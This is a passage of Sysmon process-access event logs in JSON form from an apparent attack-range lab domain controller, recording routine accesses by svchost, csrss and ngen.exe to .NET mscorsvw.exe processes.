C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.841","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001061AF0C00}","TargetProcessId":"4852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7831,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.887\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001055B30C00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.887","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001055B30C00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7832,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.887\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001055B30C00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.887","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001055B30C00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7833,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001055B30C00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001055B30C00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7834,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.950\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-0010DAB60C00}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.950","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-0010DAB60C00}","TargetProcessId":"4136","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7835,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.950\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-0010DAB60C00}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.950","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-0010DAB60C00}","TargetProcessId":"4136","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7836,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.950\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-0010DAB60C00}\r\nTargetProcessId: 4136\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.950","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-0010DAB60C00}","TargetProcessId":"4136","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7837,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.981\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001060BA0C00}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.981","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001060BA0C00}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4